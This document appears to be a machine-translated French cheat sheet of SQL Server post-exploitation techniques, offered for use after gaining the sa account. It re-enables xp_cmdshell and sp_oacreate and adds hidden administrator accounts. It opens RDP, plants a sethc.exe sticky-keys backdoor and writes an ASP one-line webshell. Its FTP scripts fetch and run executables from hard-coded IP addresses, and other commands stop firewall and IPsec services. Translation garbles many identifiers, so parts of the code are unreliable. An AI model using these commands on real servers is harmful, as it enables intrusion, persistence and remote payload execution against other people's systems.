Ordres de réparation de 1433
NET user SQLDebugger list /add
net localgroup administrators SQLDebugger /add
Message d’erreur : Échec de trouver la procédure stockée 'master.. xp_cmdshell'。
Méthode de réparation : très générale, en fait, les 126 autres 127 peuvent être réparés ensemble,
Sauf xplog70.dll tout le reste peut être corrigé avec cette commande
xp_cmdshell nouvelles méthodes de récupération
Étape 1 : Supprimer :
Procédure de chute sp_addextendedproc
Procédure de chute sp_oacreate
sp_dropextendedproc exécutif « xp_cmdshell »
Serveur : Msg 3701, Niveau 11, État 5, Ligne 1
Il n’est pas possible de supprimer le processus « sp_addextendedproc » car il n’existe pas dans le répertoire système.
Serveur : Msg 3701, Niveau 11, État 5, Procédure sp_dropextendedproc, Ligne 18
Il n’est pas possible de supprimer le processus « xp_cmdshell » car il n’existe pas dans le répertoire système.
Étape 2 Récupération :
DBCC AddExtendedProc (« sp_oacreate », « odsole70.dll »)
DBCC addextendedproc (« xp_cmdshell », « xplog70.dll »)
Récupération directe, qu’sp_addextendedproc’existe ou non
xplog70.dll correctifs :
Message d’erreur : Le xplog70.dll DLL ou l’un des DLL référencés par le DLL ne pouvait pas être monté. Raison : 126 (Le module spécifié est introuvable.) )。
Corrigez XPLOG70.DLL (vérifiez d’abord le dossier de sauvegarde \x86\bin avec le fichier, puis remplacez le dossier suivant)
Étape 1
sp_dropextendedproc exécutif « xp_cmdshell »
Étape 2
DBC addextendedproc (« xp_cmdshell »,"c :\sql2ksp4\x86\binn\xplog70.dll »)
Échec de trouver la procédure stockée 'maître.. xp_cmdshell'。
Étape 1 :
créer la procédure sp_addextendedproc --- 30/08/1996 20:13
@functname Nvarchar(517),/* (propriétaire.) Nom de la fonction à appeler
*/
@dllname varchar(255)/* nom de la fonction contenant la DLL */
comme
Déclenchez implicit_transactions
si @@trancount > 0
Début
raiserror (15002,-1,-1,'sp_addextendedproc')
Retour (1)
Fin
DBCC AddExtendedProc( @functname, @dllname)
retour (0) -- sp_addextendedproc
GO
Étape 2 :
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll’declare @o int
SQL Server bloquait l’accès à la « sys.xp_cmdshell » du processus du composant « xp_cmdshell » car ce composant avait été désactivé dans le cadre de la configuration de sécurité de ce serveur. Les administrateurs système peuvent activer la « xp_cmdshell » en utilisant sp_configure. Pour plus d’informations sur l’activation de xp_cmdshell, consultez Peripheral App Configurator dans la série SQL Server Online Books.
; EXÉCUTIF sp_configure « montrer les options avancées », 1 --
; RECONFIGURER AVEC OVERRIDE --
; EXÉCUTIF sp_configure 'xp_cmdshell', 1 --
; RECONFIGURER AVEC OVERRIDE --
; EXÉCUTIF sp_configure « afficher les options avancées », 0 --
Supprimer le stockage dangereux SQL :
PROCÉDURE DE LARGAGE sp_makewebtask
Maître exécutif... sp_dropextendedproc xp_cmdshell
Maître exécutif... sp_dropextendedproc xp_dirtree
Maître exécutif... sp_dropextendedproc xp_fileexist
Maître exécutif... sp_dropextendedproc xp_terminate_process
Maître exécutif... sp_dropextendedproc sp_oamethod
Maître exécutif... sp_dropextendedproc sp_oacreate
Maître exécutif... sp_dropextendedproc xp_regaddmultistring
Maître exécutif... sp_dropextendedproc xp_regdeletekey
Maître exécutif... sp_dropextendedproc xp_regdeletevalue
Maître exécutif... sp_dropextendedproc xp_regenumkeys
Maître exécutif... sp_dropextendedproc xp_regenumvalues
Maître exécutif... sp_dropextendedproc sp_add_job
Maître exécutif... sp_dropextendedproc sp_addtask
Maître exécutif... sp_dropextendedproc xp_regread
Maître exécutif... sp_dropextendedproc xp_regwrite
Maître exécutif... sp_dropextendedproc xp_readwebtask
Maître exécutif... sp_dropextendedproc xp_makewebtask
Maître exécutif... sp_dropextendedproc xp_regremovemultistring
Maître exécutif... sp_dropextendedproc sp_OACreate
PROCÉDURE DE LARGAGE sp_addextendedproc
Restaurer les procédures de stockage étendues
Restaurez d’abord le sp_addextendedproc, l’énoncé est le suivant :
Premièrement :
créer la procédure sp_addextendedproc --- 30/08/1996 20:13
@functname Nvarchar(517),/* (propriétaire.) nom de la fonction pour appeler */ @dllname varchar(255)/* nom de la DLL contenant la fonction */ comme
Déclenchez implicit_transactions
si @@trancount > 0
Début
raiserror (15002,-1,-1,'sp_addextendedproc')
Retour (1)
Fin
DBCC AddExtendedProc( @functname, @dllname)
retour (0) -- sp_addextendedproc
GO
Deuxièmement :
Utiliser maître
sp_addextendedproc xp_cmdshell exécutif, « xp_cmdshell.dll »
sp_addextendedproc xp_dirtree exécutif, « xpstar.dll »
sp_addextendedproc xp_enumgroups exécutif, « xplog70.dll »
sp_addextendedproc xp_fixeddrives exécutif, « xpstar.dll »
sp_addextendedproc xp_loginconfig exécutif, « xplog70.dll »
sp_addextendedproc xp_enumerrorlogs exécutif, « xpstar.dll »
sp_addextendedproc xp_getfiledetails exécutif, « xpstar.dll »
sp_addextendedproc sp_OACreate exécutif, « odsole70.dll »
sp_addextendedproc sp_OADestroy exécutif, « odsole70.dll »
sp_addextendedproc sp_OAGetErrorInfo exécutif, « odsole70.dll »
sp_addextendedproc sp_OAGetProperty exécutif, « odsole70.dll »
sp_addextendedproc sp_OAMethod exécutive, « odsole70.dll »
sp_addextendedproc sp_OASetProperty exécutif, « odsole70.dll »
sp_addextendedproc sp_OAStop exécutif, « odsole70.dll »
sp_addextendedproc xp_regaddmultistring exécutif, « xpstar.dll »
sp_addextendedproc xp_regdeletekey exécutif, « xpstar.dll »
sp_addextendedproc xp_regdeletevalue exécutif, « xpstar.dll »
sp_addextendedproc xp_regenumvalues exécutif, « xpstar.dll »
sp_addextendedproc xp_regread exécutif, « xpstar.dll »
sp_addextendedproc xp_regremovemultistring exécutif, « xpstar.dll »
sp_addextendedproc xp_regwrite exécutif, « xpstar.dll »
sp_addextendedproc xp_availablemedia exécutif, « xpstar.dll »
Supprimez l’instruction qui étend la procédure stockée xp_cmdshell :
sp_dropextendedproc exécutif « xp_cmdshell »
Récupérer l’instruction sql de cmdshell
exécutif sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Ouvrez l’instruction SQL cmdshell
exécutif sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Déterminer si une expansion de stockage existe
Select Count(*) à partir de master.dbo.sysobjects où xtype='x' et name='xp_cmdshell'
Le résultat de retour est 1 et c’est correct
Restaurez xp_cmdshell
exécutif master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll' ; Select Count(*) à partir de master.dbo.sysobjects où xtype='x' et name='xp_cmdshell'
Le résultat de retour est 1 et c’est correct
Sinon, téléchargez xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c :\winnt\system32\xplog70.dll'
Bloquez l’instruction sql de cmdshell
sp_dropextendedproc « xp_cmdshell
Un. Changer la méthode du mot de passe SA :
Après avoir connecté à l’outil d’utilisation complète de SQL, exécutez la commande suivante :
exec sp_password NULL, 'nouveau mot de passe', 'sa'
(Indice : utilisez avec prudence !)
Deux. Il suffit de corriger le mot de passe faible.
Méthode 1 : Interroger le répartiteur après la connexion :
si existe (sélectionnez * depuis
dbo.sysobjects où id = object_id(N'[dbo].[ xp_cmdshell]') et
OBJECTPROPERTY(id, N’IsExtendedProc') = 1)
exécutif sp_dropextendedproc N'[dbo]. [xp_cmdshell] »
GO
Ensuite, appuyez sur la touche F5 pour exécuter la commande
Méthode 2 : Interroger une fois le séparateur connecté
La première étape est d’exécuter : utiliser maître
Étape 2 : sp_dropextendedproc « xp_cmdshell »
Ensuite, appuyez sur la touche F5 pour exécuter la commande
Le xpsql70.dll DLL ou l’un des DLL référencés par le DLL ne peut pas être monté. Raison 126 (Le module spécifié est introuvable. )
Méthode de récupération : Après avoir interrogé la connexion du répartiteur,
Étape 1 : sp_dropextendedproc « xp_cmdshell »
Étape 2 : sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
La fonction xp_cmdshell ne peut pas être trouvée dans la bibliothèque xpweb70.dll. Raison : 127 (Le programme spécifié est introuvable.) )
Méthode de récupération : Après avoir interrogé la connexion du répartiteur,
Étape 1 Exécution : exécutif sp_dropextendedproc « xp_cmdshell »
Étape 2 : exécutif sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Ensuite, appuyez sur la touche F5 pour exécuter la commande
Si aucune des méthodes ci-dessus n’est récupérable, veuillez essayer d’ajouter directement le compte en utilisant les méthodes suivantes :
Après avoir interrogé la connexion du répartiteur,
Système 2000servser :
déclare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c :\winnt\system32\cmd.exe /c net user web hacker /add'
déclare @shell int exec sp_oacreate 'wscrip remove t.shell',@shell output exec sp_oamethod @shell,'run',null,'c :\winnt\system32\cmd.exe /c net localgroup administrators Web /add »
XP ou 2003Server System : erreur 126 ! commande
déclare @shell INT exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c :\windows\system32\cmd.exe /c net user Web$ hacker /add'
Déclare @shell int exec sp_oacreate 'wscrip remove t.shell', @shell output exec sp_oamethod @shell,'run',null,'c :\windows\system32\cmd.exe /c net localgroup administrators Web$ /add »
C:\>DIR C:\
SQL Server bloquait l’accès à la « sys.xp_cmdshell » du processus du composant « xp_cmdshell » car ce composant avait été désactivé dans le cadre de la configuration de sécurité de ce serveur. Les administrateurs système peuvent activer la « xp_cmdshell » en utilisant sp_configure. Pour plus d’informations sur l’activation de xp_cmdshell, consultez Peripheral App Configurator dans la série SQL Server Online Books.
Instructions exécutées par l’analyseur :
EXEC sp_configure « montrer les options avancées », 1 ; RECONFIGURER ; EXÉCUTIF sp_configure « xp_cmdshell », 1 ; RECONFIGURER ;
Parfois, lors de l’exécution des instructions ci-dessus avec une connexion détacheur de requête, la procédure stockée n’est pas disponible sp_addextendedproc
Solution de contournement :
créer la procédure sp_addextendedproc --- 30/08/1996 20:13
@functname Nvarchar(517),/* (propriétaire.) Nom de la fonction à appeler */
@dllname varchar(255)/* nom de la fonction contenant la DLL */
comme
Déclenchez implicit_transactions
si @@trancount > 0
Début
raiserror (15002,-1,-1,'sp_addextendedproc')
Retour (1)
Fin
DBCC AddExtendedProc( @functname, @dllname)
retour (0) -- sp_addextendedproc
GO
Ce code est collé dans le séparateur de requêtes et exécuté
Explorateur :
c:\windows\explorer.exe
Voir la table des matières
exécutif master.dbo.xp_subdirs 'C :\'
Disques de liste
Maître exécutif... xp_fixeddrives
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号!
EXÉCUTIF master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SoftWare\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD',0
Sélectionnez * depuis OpenRowSet('Microsoft.Jet.OLEDB.4.0',' ; Database=c :\windows\system32\ias\ias.mdb','select shell(« net user 123 123 /add »)') ;
Sélectionnez * depuis OpenRowSet('Microsoft.Jet.OLEDB.4.0',' ; Database=c :\windows\system32\ias\ias.mdb','select shell(« net localgroup administrators 123 /add »)') ;
echo Windows Registry Editor version 5.00 >3389.reg
Echo. >>3389.reg
echo [HKEY_LOCAL_MACHINE\LOGICIEL\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo « Activé »="0 » >>3389.reg
echo [HKEY_LOCAL_MACHINE\LOGICIEL\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
écho à « ShutdownWithoutLogin »="0 » >>3389.reg
echo [HKEY_LOCAL_MACHINE\LOGICIEL\Politiques\Microsoft\Windows\Installer] >>3389.reg
echo « EnableAdminTSRemote"=dword :00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo « TSEnabled »=dword :00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo « Start »=dword :00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo « Start »=dword :00000002 >>3389.reg
Echo [HKEY_USERS\. PAR DÉFAUT\Disposition du clavier\Bascule] >>3389.reg
écho à « raccourci clavier »="1 » >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo « PortNumber"=dword :0000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo « PortNumber"=dword :0000D3D >>3389.reg
regedit /s 3389.reg
Ouvert 3389 :
exécutif master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0 ; --
Passage 3389 :
exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1 ;
Regarde le port 3389
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp', 'PortNumber'
Porte dérobée CMD normale
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger', 'reg_sz','c :\windows\system32\cmd.exe'
win2K va directement sur PS Mar
Maître exécutif... xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD',1
Select * from OpenRowSet('microsoft.jet.oledb.4.0',' ; database=c :\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
win03-XP directement sur les chevaux PS
Maître exécutif... xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD',1
Select * from OpenRowSet('microsoft.jet.oledb.4.0',' ; Database=c :\Windows\System32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt& @echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")')
5. Déplacer la commande de la porte dérobée
déclare @o int
exécutif sp_oacreate 'scrip remove ting.filesystemobject', @o out
exécutif sp_oamethod @o, 'copyfile',null,'c :\windows\explorer.exe', 'c :\windows\system32\sethc.exe' ;
déclare @o int
exécutif sp_oacreate 'scrip remove ting.filesystemobject', @o out
exécutif sp_oamethod @o, 'copyfile',null,'c :\windows\system32\sethc.exe', 'c :\windows\system32\dllcache\sethc.exe' ;
Copié c :\Windows\explorer.exe c :\Windows\system32\sethc.exe
Copié : \Windows\System32\sethc.exe C :\Windows\System32\dLLCACHE\sethc.exe
déclare @o int
exécutif sp_oacreate « wscrip remove t.shell », @o out
exécutif sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX est la commande que vous souhaitez exécuter
Écrire la valeur spécifiée dans la clé spécifiée dans le registre), en utilisant la méthode (écrire bbb dans la clé HKEY_LOCAL_MACHINE\LOGICIEL\aaa\aaaValue) :
Maître exécutif... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='LOGICIEL\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'
@echo ouvrir 121.22.56.5>c :\bin.txt&@echo list>>c :\bin.txt&@echo list>>c :\bin.txt&@echo obtenez gzn.exe>>c :\bin.txt&@echo bye>>c :\bin.txt&@ftp -s :c :\bin.txt&del c :\bin.txt&gzn.exe& gzn.exe&gzn.exe
D’abord, copiez ftp.exe dans le répertoire wmpub
@echo CD C :\wmpub\>c :\wmpub\in.bat&@echo ftp -s :c :\wmpub\xiuxiu.txt>>c :\wmpub\in.bat
Open 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal » « Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators IUSR_SERVER /add
SQL écrit une phrase
exécutif master.dbo.xp_subdirs 'd :\web\cdlxkj ' ;
exécutif sp_makewebtask 'd :\web\cdlxkj\XX.asp','select''< %execute(request(« SB ») %>'' '
Promotion du mode bac à sable SA -----
----------------------
Maître exécutif... xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD',0 ;
-------------------------------------------------------
Sélectionnez * depuis OpenRowSet('Microsoft.Jet.OLEDB.4.0',' ; Database=c :\windows\system32\ias\ias.mdb','select shell(« net user sql$ 123 /add »)') ;
-------------------------------------------------------
Sélectionnez * depuis OpenRowSet('Microsoft.Jet.OLEDB.4.0',' ; Database=c :\windows\system32\ias\ias.mdb','select shell(« net localgroup administrators sql$ /add »)') ;
QUART 3389
La phrase utilisée était la suivante :
Invasion
Maître exécutif... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Débogueur',
@type='REG_SZ',
@value='C :\WINDOWS\explorer.exe'
Récupération
Maître exécutif... xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE',
@value_name='Débogueur',
@type='REG_SZ',
@value=''
Détournement d’images
Maître exécutif... xp_regwrite --- ceci est de la révision du registre !
@rootkey='HKEY_LOCAL_MACHINE', ---C’est la position !
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE », ----- C’est aussi le poste !
@value_name='Déboguage', --- c’est le nom de la table !
@type='REG_SZ', --- voici la signification de l’écriture !
@value='C :\WINDOWS\explorer.exe' ---- voici le contenu écrit !
Tout le processus consiste à utiliser le master : xp_regwrite cette composante est faite,
1.sql commande pour vérifier si la touche épinglée du registre a été détournée
Maître exécutif... xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger '
2.sql commande détourne la fonction de la touche épinglée du registre et la remplace par le gestionnaire des tâches (bien sûr, vous pouvez la remplacer par d’autres commandes que vous voulez).
xp_regwrite 'HKEY_LOCAL_MACHINE', 'LOGICIEL\Microsoft\Windows NT\CurrentVersion\Options d’exécution du fichier image\sethc.exe',
'Déboguage', 'REG_SZ', 'C :\WINDOWS\system32\taskmgr.exe'
3.sql commande pour supprimer la fonction de détournement de la clé épinglée du registre protège votre serveur contre l’exploitation par d’autres
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'LOGICIEL\Microsoft\Windows NT\CurrentVersion\Options d’exécution du fichier Image\sethc.exe'
Fichiers d’écriture SQL
déclare @o int, @f int, @t int, @ret int
exécutif sp_oacreate 'scrip remove ting.filesystemobject', @o out
exécutif sp_oamethod @o, 'createtextfile', @f sortie, 'c :\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject(« Wscrip remove t.NETWORK »)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork. NomOrdinateur
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group »)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob. Create(« user »,"test »)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetPassword « 1234 »
exec @ret = sp_oamethod @f, 'writeline', NULL,'od. SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test »,user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
Scripts sans escalade NET
Struser=wscrip pour supprimer t.arguments(0)
strpass=wscrip pour supprimer t.arguments(1)
set lp=createObject(« Wscrip remove t.NETWORK »)
oz="WinNT://"&lp. Nom informatique
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group »)
Set od=ob.create(« user »,struser)
OD. SetPassword strpass
OD. SetInfo
Set of=GetObject(oz&"/ » & struser & « ,user »)
OE. Ajout(de). ADsPath)
Pour chaque administrateur dans OE. Membres
si struser=admin. Alors nommer
Wscrip a supprimé t.echo struser & « Établi avec succès ! »
wscrip pour supprimer t.quit
fin si
Prochain
Wscrip remove t.echo struser & « User establishment failed » !
Sauvegardez ce qui précède comme utilisateur. fichier VBS
Ensuite, exécutez : cscrip pour supprimer le mot de passe du nom d’utilisateur user.vbs
En utilisant le mode bac à sable JET, vous pouvez résoudre les problèmes causés par des procédures stockées telles que XP_cmdshell et les bibliothèques de liens dynamiques associées. Pour des raisons de sécurité, le système n’active pas par défaut le mode bac à sable, ce qui nécessite xp_regwrite d’activer le mode bac à sable :
Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines', 'SandBoxMode', 'REG_DWORD',1
Ensuite, exécutez la commande bac à sable pour ajouter un test utilisateur nommé avec le mot de passe 1234 au système :
Select * from OpenRowSet('microsoft.jet.oledb.4.0',' ; database=c :\windows
\system32\ias\ias.mdb','select shell(« cmd.exe /c net user test 1234 /add »)')
Select * from OpenRowSet('microsoft.jet.oledb.4.0',' ; database=c :\windows
\system32\ias\ias.mdb','sélection shell ("cmd.exe /c NET localgroup
les administrateurs testent /add")')
Différents systèmes d’exploitation ont des chemins différents et doivent être modifiés selon la situation :
NT/2K : c :\winnt\system32\
XP/2003 : c :\windows\system32\
De plus, dans Microsoft SQL Server 2005, certaines procédures stockées sont fermées par défaut et nécessitent des commandes pour s’ouvrir :
Allumez XP_cmdshell :
EXEC sp_configure « montrer les options avancées », 1 ; RECONFIGURER ; EXÉCUTIF sp_configure
« xp_cmdshell », 1 ; RECONFIGURER ;
Ouvrir « OPENROWSET » :
exécutif sp_configure « montrer les options avancées », 1 ; RECONFIGURER ; sp_configure exécutif
« Requêtes distribuées ad hoc »,1 ; RECONFIGURER ;
Allumez « sp_oacreate » :
exécutif sp_configure « montrer les options avancées », 1 ; RECONFIGURER ; sp_configure exécutif
« Procédures d’automatisation de l’ancienne », 1 ; RECONFIGURER ;
Voici quelques situations où la commande d’exécution sous sa est incorrecte :
1. Le xpsql70.dll DLL ou un DLL référencé par le DLL ne peut pas être chargé. Raison 126 (Le module spécifié est introuvable. )
Cette situation est relativement courante, et la réparation est simple et simple, mais il y a des conditions. Si vous pouvez lister le répertoire dans ce cas (avec sqltools v2.0 il y a une fonction de répertoire). Félicitations pour cette situation à 80 % peut être corrigée ; si vous pouvez lister le répertoire, il suffit de trouver le chemin xplog70.dll et d’exécuter la commande suivante.
Étape 1
Exec sp_dropextendedproc 'xp_cmdshell' (cette commande consiste à supprimer le cmdshell original, car il a déjà mal tourné)
Étape 2
dbcc addextendedproc (« xp_cmdshell »,"c :\Program Files\Microsoft SQL Server\MSSQL\xplog70.dll »)
; EXEC sp_configure « montrer les options avancées », 0 –
Bien sûr, c’est une commande sql, exécutée avec un analyseur de requêtes. Le c :\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll dans la deuxième étape est le chemin du xplog70.dll, ce chemin est relativement courant, si le disque C ne l’a pas, vous pouvez trouver d’autres lettres du disque.
2. Impossible de trouver la fonction xp_cmdshell dans la xpweb70.dll de la bibliothèque. Raison : 127 (Le programme spécifié est introuvable.) )
En fait, c’est la même chose que les 126 ci-dessus, c’est-à-dire que le cmdshell est erroné, tant que vous trouvez la sauvegarde xplog70.dll suivez la méthode ci-dessus pour le corriger.
3. Échec de trouver le « maître » de la procédure stockée. xpcmdshell »
Dans ce cas, je vois sur Internet que la méthode est la suivante :
Étape 1 : Supprimer :
Procédure de chute sp_addextendedproc
Procédure de chute sp_oacreate
sp_dropextendedproc exécutif « xp_cmdshell »
Étape 2 Récupération :
DBCC AddExtendedProc (« sp_oacreate », « odsole70.dll »)
DBCC addextendedproc (« xp_cmdshell », « xplog70.dll »)
En fait, cela reste le même que ce qui précède, en fait, si vous faites attention, le 126 127 ci-dessus ne trouvera que la procédure stockée 'master :. xpcmdshell » car la première étape consiste à supprimer la procédure stockée de cmdshell. Dans ce cas, il suffit de suivre la deuxième étape ci-dessus.
4. Message d’erreur : SQL Server a bloqué l’accès au processus « sys.xp_cmdshell » du composant « xp_cmdshell » car ce composant a été désactivé dans le cadre de la configuration de sécurité de ce serveur. Les administrateurs système peuvent activer la « xp_cmdshell » en utilisant sp_configure. Pour plus d’informations sur l’activation de xp_cmdshell, consultez Peripheral App Configurator dans la série SQL Server Online Books.
Cette situation est la plus simple, car vous n’avez à rien penser, il suffit d’exécuter la commande suivante
; EXÉCUTIF sp_configure « montrer les options avancées », 1 --
; RECONFIGURER AVEC OVERRIDE --
; EXÉCUTIF sp_configure 'xp_cmdshell', 1 --
; RECONFIGURER AVEC OVERRIDE --
; EXEC sp_configure « montrer les options avancées », 0 –
Après la correction ci-dessus, vous pouvez exécuter la commande cmd, et vous commencerez à augmenter votre puissance. Je vérifie généralement l’IP d’abord pour voir s’il s’agit d’un intranet, puis je consulte REG HKLM\SYSTEM\CurrentControlSet\Control\Control\Terminal » « Server\WinStations\RDP-Tcp /v PortNumber pour vérifier le port terminal, puis netstat –an pour voir si le terminal est ouvert et enfin connecte le mot de passe utilisateur utilisateur / Ajoutez un utilisateur puis netez les administrateurs du groupe local utilisateur /add. Si tout se passe bien, cela fera tomber un serveur. Mais il y a de nombreux problèmes dans ce processus.
1. La promotion de puissance nette est réussie mais ne peut pas se connecter au terminal. Les situations suivantes sont présentes
(1) Le serveur est sur l’intranet.
(2) Contrôle TCP/IP.
Exécutez d’abord la commande cmd suivante :
cmd /c regedit -e c :\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, exportez la première partie du registre pour le filtrage TCP/IP
cmd /c regedit -e c :\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, exportez la seconde partie du registre pour le filtrage TCP/IP
cmd /c regedit -e c :\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip", exportant la troisième place du registre concernant le filtrage TCP/IP
Puis retournez au disque C 1.reg, 2.reg, 3.reg, téléchargez le 1.reg, 2.reg, 3.reg revenez sur votre disque dur pour éditer, trouvez le champ EnableSecurityFilters pour voir si la valeur clé après le dword est 00000000, si c’est 00000001, cela signifie que l’administrateur a fait un filtrage tcp/ip, il suffit de changer 1 par 0, 2. Reg et 3.reg font les mêmes changements.
(3) Établir une politique de sécurité de la propriété intellectuelle.
Exécutez la commande cmd : cmd /c net stop policyagent pour arrêter le service de services IPSEC. Reconnecte le terminal.
(4) L’autorisation de connexion du terminal définie par l’administrateur ne peut être utilisée que par l’utilisateur spécifié.
(5) Pare-feu. Exécutez la commande cmd : net stop alg /ynet stop sharedaccess
2. L’escalade du réseau apparaît et l’accès est refusé
Vous pouvez essayer net1 user password utilisateur /add Si net1 refuse également l’accès, vous pouvez copier une porte dérobée shfit et essayer d’exécuter la commande cmd : copy c :\windows\explorer.exe c :\windows\system32\sethc.exe
Copié : \Windows\System32\sethc.exe C :\Windows\System32\dLLCACHE\sethc.exe
Si on vous le demande, copiez un fichier qui s’avère réussi. Connectez-vous au terminal et appuyez sur 5 shift pour voir ce qui apparaît. Joue avec Kaka Explorer, maintenant ajoute simplement un utilisateur à la main.
3. L’escalade nette se produit avec l’erreur de refus d’accès 5 (surligne)
Dans ce cas, vous n’avez pas besoin d’essayer net1, vous pouvez essayer la porte dérobée de copy shift, si la copie invite à copier le fichier 0, cela prouve que ce n’est pas un succès. Ensuite, vous pouvez essayer de le téléverser, si vous le pouvez télécharger, vous pouvez envoyer directement un outil d’escalade de puissance non net sorti il y a quelque temps, puis ajouter un utilisateur. Mais la plupart de ces cas ne peuvent pas être téléchargés, il faut donc y réfléchir. Puisque cmd peut être exécuté, le fichier peut être téléchargé via cmd via ftp, mais le principe de ftp est de pouvoir écrire du texte ou un traitement batch. Ensuite, vous pouvez écrire un texte ou un lot à travers une instruction SQL.
déclare @o int, @f int, @t int, @ret int
exécutif sp_oacreate 'scrip remove ting.filesystemobject', @o out
exécutif sp_oamethod @o, 'createtextfile', @f sortie, 'C :\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'compte ftp'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'mot de passe ftp'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (no net scalation script) c :\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
Après l’exécution réussie de l’analyseur de requêtes, un 1.bat apparaîtra sur le disque C (si l’exécution est réussie mais que le disque C n’est pas là, vous pouvez modifier le dossier en écriture, car le répertoire racine du serveur interdit l’écriture)
Ensuite, cmd exécute FTP -s :c :\1.bat
Après cette exécution, vous téléchargerez un script d’escalade non net sur le lecteur CFT FTP ou écrirez directement un script d’escalade VBS
déclare @o int, @f int, @t int, @ret int
exécutif sp_oacreate 'scrip remove ting.filesystemobject', @o out
exécutif sp_oamethod @o, 'createtextfile', @f sortie, 'c :\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( « Shell.Users » )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword « password »,
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting(« AccountType »)=3'
